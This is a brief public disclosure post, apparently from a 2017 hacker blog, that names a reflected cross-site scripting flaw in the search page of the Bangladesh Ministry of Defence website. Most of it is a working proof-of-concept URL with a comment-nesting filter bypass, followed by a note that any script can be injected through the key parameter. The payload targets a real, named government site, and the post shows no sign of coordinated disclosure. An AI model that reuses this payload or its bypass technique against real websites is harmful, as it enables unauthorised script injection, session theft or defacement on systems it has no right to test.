Ministry of Defence of Bangladesh - XSS

Vulnerable page: http://www.mod.gov.bd/site/search?key=

PoC
http://www.mod.gov.bd/site/search?key=<!--<img%20src="--><img%20src=x%20onerror=alert(1)//">

You can either include any XSS code in search input box, or request any XSS code directly using GET method and key parameter.



Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Написано Neo в 2017-09-07 22:041 like

Комментарии

There are no comments for this news article, you can write one here.